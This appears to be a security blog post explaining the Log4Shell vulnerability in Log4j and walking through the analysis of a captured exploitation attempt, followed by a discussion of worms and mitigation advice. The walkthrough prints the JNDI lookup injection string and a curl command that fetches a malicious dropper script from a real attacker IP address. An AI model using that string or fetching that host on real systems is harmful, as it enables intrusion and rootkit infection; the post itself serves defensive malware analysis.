top of page
Writer's picturealvin gitonga

šŸ”„ Log4SHELL: šŸ˜ˆ A Ticking Time Bomb šŸ’£ šŸ’„

Cyber Morans šŸ¤— ,


Log4shell (CVE - 2021 - 44228) is a critical vulnerability in the widely-used logging tool Log4j, which is used by millions of computers worldwide running online services. A wide range of people, including organisations, governments and individuals are likely to be affected by it.

Although fixes have been issued, they will still need to be implemented. an open-source logging library commonly used by apps and services across the internet. If left unfixed, attackers šŸ˜ˆ can break into systems, steal passwords and logins, extract data, and infect networks with malicious software.

Log4j is used worldwide across software applications and online services, and the vulnerability requires very little expertise to exploit. This makes Log4shell potentially the most severe computer vulnerability in years.

Ā 

Who is affected by this ? šŸ¤•


Almost all applications will have some form of ability to log (for dev, op and security purposes), and Log4j is a very common component used for this. For individuals, Log4j is almost certainly part of the devices and services you use online every day. The best thing you can do to protect yourself is make sure your devices and apps are as up to date as possible and continue to update them regularly.


What is Log4j ? šŸ§


Modern software can be large, powerful, and complex. Rather than a single author writing all the code themselves as was common decades ago, modern software creation will have large teams, and that software is increasingly made out of ā€˜building blocksā€™ pulled together by the team rather than entirely written from scratch. A team is unlikely to spend weeks writing new code when they can use existing code immediately. Log4j is one of the many building blocks that are used in the creation of modern software. It is used by many organisations to do a common but vital job. We call this a software library. Log4j is used by developers to keep track of what happens in their software applications or online services. Itā€™s basically a huge journal of the activity of a system or application. This activity is called ā€˜loggingā€™ and itā€™s used by developers to watch out for problems for users.

Ā 

How does Log4Shell work? šŸ¶

Log4Shell works by abusing a feature in Log4j that allows users to specify custom code for formatting a log message. This feature allows Log4j to, for example, log not only the username associated with each attempt to log in to the server but also the personā€™s real name, if a separate server holds a directory linking user names and real names. To do so, the Log4j server has to communicate with the server holding the real names.


Unfortunately, this kind of code can be used for more than just formatting log messages. Log4j allows third-party servers to submit commands that can perform all kinds of actions on the targeted computer. This opens the door for nefarious activities such as stealing sensitive information, taking control of the targeted system and slipping malicious content to other users communicating with the affected server.


It is relatively simple to exploit Log4Shell. I was able to reproduce the problem with Ghidra, a reverse-engineering framework for security researchers, pretty easily. There is a very low bar for using this exploit, which means a wider range of people with malicious intent can use it.


Log4j is everywhere ā˜ ļø

One of the major concerns about Log4Shell is Log4jā€™s position in the software ecosystem. Logging is a fundamental feature of most software, which makes Log4j very widespread. In addition to popular games like Minecraft, itā€™s used in cloud services like Apple iCloud, Safaricom, Telcom, Jiji, JUMIA, apps and Amazon Web Services, as well as a wide range of programs from software development tools to security tools.

This means hackers have a large menu of targets to choose from: home users, service providers, source code developers and even security researchers. So while big companies like Amazon can quickly patch their web services to prevent hackers from exploiting them, there are many more organizations that will take longer to patch their systems, and some that might not even know they need to.

Ā 

The damage that can be done

Hackers šŸ˜ˆ are scanning through the internet to find vulnerable servers and setting up machines that can deliver malicious payloads. To carry out an attack, they query services (for example, web servers) and try to trigger a log message (for example, a 404 error). The query includes maliciously crafted text, which Log4j processes as instructions.

These instructions can create a reverse shell, which allows the attacking server to remotely control the targeted server, or they can make the target server part of a botnet. Botnets use multiple hijacked computers to carry out coordinated actions on behalf of the hackers.


A large number of hackers šŸ„ø are already trying to abuse Log4Shell. These range from ransomware gangs locking down minecraft servers to hacker groups trying to mine bitcoin and hackers associated with China and North Korea trying to gain access to sensitive information from their geopolitical rivals. The Belgian ministry of defense reported that its computers were being attacked using Log4Shell.

Ā 

Investigating a Log4j Malware attack

I stumbled upon a malware attack attempt šŸ˜ˆ exploiting the Log4J vulnerability and analysed it with a few tools. ā˜ ļø The victim? A supermarket or some sort of store in KZN, South Africa.....I caught it using netlas.io and any.run and thought it a good example.

So lemme show you;

First we view the logs šŸ‘‡


The part after Bearer šŸ‘† .....is the attack itself. As you can see it has

${jndi:ldap://attackerIP/payloadpath}. 

Typical Log4j exploitation technique. But the actual payload command is obfuscated. This we can simply decode with base64 to reveal it šŸ‘‡

and voila! That is the command šŸ‘†

so to recap, So far it calls to an attackerIP, create a basic shell (.sh), the run a command that is base64 encoded.

Now I will curl the entire path. Yes! Curl can download from ldap. Watch...šŸ‘‡

and straight up we have more info.šŸ‘† javaCodeBase must be the base URL, seems to call a class....javaFactory is that class (or payload). Lets mess with it, No? šŸ‘‡

Error 404 šŸ‘† . Now did read that sometimes this request can time out if not executed fast enough....try and try and NOTHING šŸ’©šŸ’©šŸ’©. It just kept deleting the object before I could reach it.


So i go to github and search for script that can automate this request. Yes! found 3. Tested them and this worked best. It is from MalwareTechBlog Github. it parses out the Url and the javaFactory and basically just gets the class. šŸ‘‡

Now we have the class ā˜ ļø, actual payload, the exploit, the šŸ¤¬ (Samuel L. Jackson's favourite word!) šŸ‘‡

ExploitIssnkiBjvy.class

Now we open it with jd-GUI, a java decompiler so we can see the code šŸ‘‡

šŸ‘‡

ā˜ ļø Sorry for Light Mode. However, java code is mostly not obfuscated and thus readable to anyone with any basic programming background. So, what are we looking at šŸ‘†;


first you notice the same string we decoded with base64 earlier appear here. ā˜ ļø Now if you were to copy that into your shell (I wouldnt dare you to šŸ’©) It will infect your machine. ā˜ ļø Especially if its your main machine. I used a VM and so am licensed to be reckless.....

SO lets get reckless;

I open a new terminal and type

curl 194.40.243.149/lh.sh

Note I removed the -s (for silent) so I could see what it does. more like -v (verbose) šŸ‘‡

the šŸ‘† ld.so.preload is commonly used to load malicious modules such as ā˜ ļø Bootkits and ā˜ ļø Rootkits. So i bet this is some sort of rootkit. It disables the firewalls, Iptables etc.

lets scroll to where the payload is actually downloaded šŸ‘‡

Right there šŸ‘†, got it! BIN_DOWNLOAD_URL="http:..... Is the URL its getting from.

then downloads a file: libsystem.so I bet this is the rootkit šŸ’€

so lets fetch it šŸ‘‡

Many many minutes later šŸ‘‡

HUUUUUUGE binary....šŸ‘†

lets cat the strings;.....I bet it will C language...or Assembly or bash....šŸ‘‡

NOOOOOOPE! šŸ‘† its Golang...The malware is in Golang people!....This is getting very common. Malware in Golang and Rust...probably because you can make an impossibly huuuge binary file.


This was a PoC (proof of concept) of malware exploiting log4shell. I wont reverse the binary today.

Ā 

Why havent we seen a devastating worm yet šŸ¤–

On the news and on social media you've probably seen a lot of claims that a log 4j worm is coming and when it comes it's going to cause all kinds of problems it's going to be the worst case scenario and that we need to do everything to avoid it and it's been a couple of months now and we're probably wondering well where is this log 4j worm.


1. šŸ‘‰ A worm is very hard to make. when you look at history, Stuxnet, Wannacry, Notpetya.....these were very specific, state-sponsored attacks. They require a lot of skill and Money to get one but mostly...They take time. Stuxnet was built over 5 years just to compromise Iran. These are heavy duty cyber crime requiring a bottomless sponsor (Governments). But also these are made for very specific purposes and are used for Cyber warfare. Stuxnet was USA messing Iran, Notpetya was Adolf Putin (Russia) waging war over Ukraine and Wannacry was Kim Jong Un Looking for some extra pocket money.


2. šŸ‘‰ A reason to have a worm is because you have a lot of devices that are connected to the local network but not connected to the WAN or the the internet and this was the case with wannacry and notpetya, the smb server which the vulnerability affected smb and the smb server might be connected to the internet but all of the computers on the network would have been behind a firewall, or not. so what would happen is the virus would hit the smb server from the internet and then spread within the network from there and that was the only way it could reach those systems that were not directly connected to the internet, but log4j is a lot different to eternalblue.


3. šŸ‘‰ These were protocol vulnerabilities (Eternalblue and bluekeep), Log4J is a library vulnerability. While its rampant, its used very differently depending on the developer. A dev can be logging timestamps, requests, error messages, IRC messages...etc. Not particularly juicy info. A log4j worm would need to have all these exploits, for different uses of the library in a software. This is noisy, and mostly pointless.


Ā 

Mitigation šŸ‘©ā€āš•ļø

As a user, you are probably wondering what can you do about all this. Unfortunately, it is hard to know whether a software product you are using includes Log4j and whether it is using vulnerable versions of the software. However, you can help by heeding the common refrain from computer security experts:


šŸ‘‰ Make sure all of your software is up to date.

Due to the severity of the Log4j vulnerability, a system with any installed instance of Log4j, regardless of whether it is part of a running application or service, should be treated as vulnerable.

šŸ‘‰ Out-of-date Log4j versions need to be updated immediately. To identify vulnerable systems, internal and external vulnerability scanning tools, which contain signatures or plugins for identifying Log4j instances, can be used.

šŸ‘‰ Open-source vulnerability toolsets can also be leveraged, such as https://github.com/fullhunt/log4j-scan and https://github.com/jfrog/log4j-tools.


CONCLUSION

Subscribe to receive notifications of similar posts šŸ˜‹ where we will be reverse engineering malware and the technical aspect of vulnerabilities as well as how an attacker may use this vulnerability as an attack vector and other Infosec stuff...šŸ˜‹


Morans,


Thank you for your time, Like and leave a comment/review and as always, stay awesome! šŸ˜‹šŸ‘Š šŸ’Ŗ

20 views0 comments

Recent Posts

See All

Comments


Post: Blog2_Post
bottom of page